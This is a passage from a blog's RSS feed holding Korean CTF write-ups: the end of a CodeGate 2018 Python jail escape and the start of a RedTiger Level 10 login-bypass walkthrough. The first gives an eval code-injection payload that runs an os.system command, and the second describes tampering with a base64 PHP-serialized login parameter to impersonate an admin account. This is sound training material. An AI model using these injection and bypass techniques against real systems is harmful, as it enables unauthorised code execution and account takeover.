class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;eval&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;your.&quot;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;work&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;()&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-141&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;watcher&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;Behavior_analysis&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-142&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-143&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;your&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;day&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;+=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;1&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-144&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;your&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;day&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;10&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-145&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;sys&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;stderr&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;10 days over...&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-146&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;exit&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;/div&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&lt;strong style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;Impel_Down.py&lt;/strong&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&amp;nbsp;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;소스코드를 살펴보면 FLAG 파일은 root 경로에 존재하며, 실행 시 FLAG를 얻을 수 있다고 합니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&lt;strong style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;name : __import__(‘os’).system(‘/FLAG_FLAG_FLAG_LOLOLOLOLOLOL’)&lt;/strong&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&lt;strong style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;work : dig,eval(name),your.dig&lt;/strong&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&amp;nbsp;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;이와 같이 수행하게 되면 플래그를 얻어낼 수 있습니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&amp;nbsp;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif; text-align: center;&quot;&gt;FLAG :&amp;nbsp;&lt;strong style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;Pyth0n J@il escape 1s always fun @nd exc1ting !&amp;nbsp;&lt;img draggable=&quot;false&quot; class=&quot;emoji&quot; alt=&quot; &quot; src=&quot;https://s.w.org/images/core/emoji/11/svg/1f642.svg&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; border: none !important; vertical-align: -0.1em !important; max-width: 100%; height: 1em !important; display: inline !important; box-shadow: none !important; width: 1em !important; margin: 0px 0.07em !important; background: none !important; padding: 0px !important;&quot;&gt;&lt;/strong&gt;&lt;/p&gt;</description>
      <category>CTF/CodeGate 2018 Qualifier</category>
      <category>CODEGATE</category>
      <category>codegate 2018</category>
      <category>impel down</category>
      <category>misc</category>
      <author>Choiys</author>
      <guid isPermaLink="true">https://choiys.tistory.com/244</guid>
      <comments>https://choiys.tistory.com/entry/Misc-%E2%80%93-Impel-Down#entry244comment</comments>
      <pubDate>Sat, 16 Feb 2019 11:15:41 +0900</pubDate>
    </item>
    <item>
      <title>[RedTiger] Level 10</title>
      <link>https://choiys.tistory.com/entry/RedTiger-Level-10</link>
      <description>&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 319px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/993968335A0191020B&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F993968335A0191020B&quot; width=&quot;319&quot; height=&quot;142&quot; filename=&quot;1_prob.png&quot; filemime=&quot;image/jpeg&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;페이지에 접속해보면 Login 버튼이 존재한다. 우리의 목표는 TheMaster 계정으로 로그인 하는것이다.&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 325px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/99F48B335A01910223&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99F48B335A01910223&quot; width=&quot;325&quot; height=&quot;234&quot; filename=&quot;2_login.png&quot; filemime=&quot;image/jpeg&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Login 버튼을 눌러보면 Monkey 계정으로 로그인 된 것을 확인 할 수 있다.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;pre style=&quot;background:#fff;color:#000&quot;&gt;
        &lt;span style=&quot;color:#3a4a64&quot;&gt;&amp;lt;&lt;span style=&quot;color:#3a4a64&quot;&gt;b&lt;/span&gt;&amp;gt;&lt;/span&gt;Welcome to Level 10&lt;span style=&quot;color:#3a4a64&quot;&gt;&amp;lt;/&lt;span style=&quot;color:#3a4a64&quot;&gt;b&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span style=&quot;color:#3a4a64&quot;&gt;&amp;lt;&lt;span style=&quot;color:#3a4a64&quot;&gt;br&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span style=&quot;color:#3a4a64&quot;&gt;&amp;lt;&lt;span style=&quot;color:#3a4a64&quot;&gt;br&lt;/span&gt;&amp;gt;&lt;/span&gt;
        Target: Bypass the login. Login as TheMaster&lt;span style=&quot;color:#3a4a64&quot;&gt;&amp;lt;&lt;span style=&quot;color:#3a4a64&quot;&gt;br&lt;/span&gt;&amp;gt;&lt;/span&gt;
        &lt;span style=&quot;color:#3a4a64&quot;&gt;&amp;lt;&lt;span style=&quot;color:#3a4a64&quot;&gt;br&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span style=&quot;color:#3a4a64&quot;&gt;&amp;lt;&lt;span style=&quot;color:#3a4a64&quot;&gt;br&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span style=&quot;color:#3a4a64&quot;&gt;&amp;lt;&lt;span style=&quot;color:#3a4a64&quot;&gt;br&lt;/span&gt;&amp;gt;&lt;/span&gt;
        &lt;span style=&quot;color:#3a4a64&quot;&gt;&amp;lt;&lt;span style=&quot;color:#3a4a64&quot;&gt;form&lt;/span&gt; &lt;span style=&quot;color:#3a4a64&quot;&gt;method&lt;/span&gt;=&lt;span style=&quot;color:#409b1c&quot;&gt;&quot;post&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;
            &lt;span style=&quot;color:#3a4a64&quot;&gt;&amp;lt;&lt;span style=&quot;color:#3a4a64&quot;&gt;input&lt;/span&gt; &lt;span style=&quot;color:#3a4a64&quot;&gt;type&lt;/span&gt;=&lt;span style=&quot;color:#409b1c&quot;&gt;&quot;hidden&quot;&lt;/span&gt; &lt;span style=&quot;color:#3a4a64&quot;&gt;name&lt;/span&gt;=&lt;span style=&quot;color:#409b1c&quot;&gt;&quot;login&quot;&lt;/span&gt; &lt;span style=&quot;color:#3a4a64&quot;&gt;value&lt;/span&gt;=&lt;span style=&quot;color:#409b1c&quot;&gt;&quot;YToyOntzOjg6InVzZXJuYW1lIjtzOjY6Ik1vbmtleSI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;
            &lt;span style=&quot;color:#3a4a64&quot;&gt;&amp;lt;&lt;span style=&quot;color:#3a4a64&quot;&gt;input&lt;/span&gt; &lt;span style=&quot;color:#3a4a64&quot;&gt;type&lt;/span&gt;=&lt;span style=&quot;color:#409b1c&quot;&gt;&quot;submit&quot;&lt;/span&gt; &lt;span style=&quot;color:#3a4a64&quot;&gt;value&lt;/span&gt;=&lt;span style=&quot;color:#409b1c&quot;&gt;&quot;Login&quot;&lt;/span&gt; &lt;span style=&quot;color:#3a4a64&quot;&gt;name&lt;/span&gt;=&lt;span style=&quot;color:#409b1c&quot;&gt;&quot;dologin&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;
        &lt;span style=&quot;color:#3a4a64&quot;&gt;&amp;lt;/&lt;span style=&quot;color:#3a4a64&quot;&gt;form&lt;/span&gt;&amp;gt;&lt;/span&gt;
        &lt;span style=&quot;color:#3a4a64&quot;&gt;&amp;lt;&lt;span style=&quot;color:#3a4a64&quot;&gt;br&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span style=&quot;color:#3a4a64&quot;&gt;&amp;lt;&lt;span style=&quot;color:#3a4a64&quot;&gt;br&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span style=&quot;color:#3a4a64&quot;&gt;&amp;lt;&lt;span style=&quot;color:#3a4a64&quot;&gt;br&lt;/span&gt;&amp;gt;&lt;/span&gt;
    Welcome Monkey. You are just a normal user!
&lt;/pre&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;소스를 확인해보면 Login 버튼을 눌렀을 때 login 파라미터로&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: rgb(26, 26, 166); font-family: monospace; font-size: medium; white-space: pre-wrap;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;YToyOntzOjg6InVzZXJuYW1lIjtzOjY6Ik1vbmtleSI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;가 전달되는 것을 알 수 있다. 이를 base64 디코딩하면 &lt;/span&gt;&lt;/span&gt;&lt;font color=&quot;#1a1aa6&quot; face=&quot;monospace&quot; size=&quot;3&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;a:2:{s:8:&quot;username&quot;;s:6:&quot;Monkey&quot;;s:8:&quot;password&quot;;s:12:&quot;0815password&quot;;}&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;가 나온다. PHP Serialize 함수의 결과이기 때문에 이를 수정하여 base64로 인코딩 후 login 파라미터에 태워 보내주면 로그인 할 수 있을 것이다.&lt;/span&gt;&lt;/span&gt;&lt;/font&gt;&lt;/p&gt;&lt;p&gt;&lt;font color=&quot;#1a1aa6&quot; face=&quot;monospace&quot; size=&quot;3&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/font&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 900px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/991290335A0192A219&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F991290335A0192A219&quot; width=&quot;900&quot; height=&quot;689&quot; filename=&quot;3_result.png&quot; filemime=&quot;image/jpeg&quot; style=&quot;&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;font color=&quot;#1a1aa6&quot; face=&quot;monospace&quot; size=&quot;3&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/font&gt;&lt;/p&gt;&lt;p&gt;&lt;font color=&quot;#1a1aa6&quot; face=&quot;monospace&quot; 